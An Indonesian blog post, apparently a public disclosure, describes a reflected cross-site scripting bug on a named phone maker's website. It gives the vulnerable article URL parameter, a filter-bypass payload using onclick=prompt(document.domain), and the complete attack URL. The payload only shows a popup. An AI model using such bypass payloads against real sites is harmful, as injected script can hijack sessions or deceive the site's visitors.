Sebenarnya bug ini sudah lama saya temukan, dan juga sudah pernah saya report cuma ya gak ada tanggapan.
Bug ini saya temukan sekitar bulan 6 tahun lalu kalau gak salah, tapi saya coba lagi dan ternyata bug ini belum juga di perbaiki.
Ok sebelum lanjut membaca mohon baca dulu DISCLAIMER, jika sudah baca berarti anda setuju dengan apa yang saya tulis.
Bug ini terletak pada url http://evercoss.com/article?ArticleName= , nah disini saya mencoba memasukkan payload seperti biasa <script>alert(1);</script> tapi kefilter menjadi \[removed\]alert(1);\[removed\]
Kemudian saya coba bypass menggunakan payload seperti ini
1
" onclick=prompt(document.domain)//<button ‘ onclick=prompt(document.domain)//> \*/ prompt(document.domain)//
hingga menjadi menjadi seperti ini
1
http://evercoss.com/article?ArticleName=**" onclick=prompt(document.domain)//<button ‘ onclick=prompt(document.domain)//> \*/ prompt(document.domain)//**
Setelah saya memasukkan payload seperti ini timbul lah pop up xss tersebut
Jelasnya bisa lihat video dibawah